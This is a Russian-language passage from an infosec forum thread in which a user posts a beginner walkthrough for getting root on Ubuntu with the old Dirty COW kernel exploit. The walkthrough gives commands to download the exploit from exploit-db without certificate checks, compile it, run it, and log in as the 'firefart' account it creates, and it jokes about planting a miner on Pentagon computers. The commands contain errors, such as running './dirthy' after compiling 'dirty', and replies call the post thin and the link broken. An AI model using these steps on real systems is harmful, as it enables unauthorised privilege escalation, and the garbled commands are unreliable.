• Твой профиль заполнен на 0%. Заполни за 1 минуту, чтобы тебя нашли единомышленники и работодатели. Заполнить →

Dirty или как просто рутануться

  • Автор темы Автор темы NeskO
  • Дата начала Дата начала
  • Теги Теги
    рут

NeskO

Green Team
10.01.2018
120
51
Несквик вернулся
Недавно после получения сессии меты, я пошель в шел(Бубунты) и рута не получил и тут я вспоминаю про Dirty довольно старый експлоит...
Но на мое удивление сработал, ну и я подумал написать че нить для новичков.
Итак:
Для начала скачаем екплоит с помошью вджета:
Код:
wget https://www.exploit-db.com/download/40839.c --no-check-certificate
Переименуем и покомпилируем эту вещь:
Код:
gcc -pthread dirty.c -o dirty –lcrypt
Терь ОЧЕНЬ ВАЖНО: начинаем злобно смеяться и запускаем екплоит:
Код:
./dirthy
После этого меняем пОрОль ток что созданого пользователь firefart, меняем пользователя на файра и набираем
Код:
su
Набираем наш пароль и ставим майнер на компы Пентагона!
 
Несквик вернулся
Недавно после получения сессии меты, я пошель в шел(Бубунты) и рута не получил и тут я вспоминаю про Dirty довольно старый експлоит...
Но на мое удивление сработал, ну и я подумал написать че нить для новичков.
Итак:
Для начала скачаем екплоит с помошью вджета:
Код:
wget https://www.exploit-db.com/download/40839.c --no-check-certificate
Переименуем и покомпилируем эту вещь:
Код:
gcc -pthread dirty.c -o dirty –lcrypt
Терь ОЧЕНЬ ВАЖНО: начинаем злобно смеяться и запускаем екплоит:
Код:
./dirthy
После этого меняем пОрОль ток что созданого пользователь firefart, меняем пользователя на файра и набираем
Код:
su
Набираем наш пароль и ставим майнер на компы Пентагона!

1. На каком ядре то хоть запускал поведай.
2. Ссылка битая на сплойт
3. На статью это вообще не тянет
4. @Vander это уже описывал с пруфами, ссылками и описанием уязвимости Dirty Cow Exploit - Codeby.net - Информационная Безопасность
 
Может быть это
Код:
https://dirtycow.ninja
 
Мы в соцсетях:

Взломай свой первый сервер и прокачай скилл — Начни игру на HackerLab

🚀 Первый раз на Codeby?
Гайд для новичков: что делать в первые 15 минут, ключевые разделы, правила
Начать здесь →
🔴 Свежие CVE, 0-day и инциденты
То, о чём ChatGPT ещё не знает — обсуждаем в реальном времени
Threat Intel →
💼 Вакансии и заказы в ИБ
Pentest, SOC, DevSecOps, bug bounty — работа и проекты от проверенных компаний
Карьера в ИБ →

HackerLab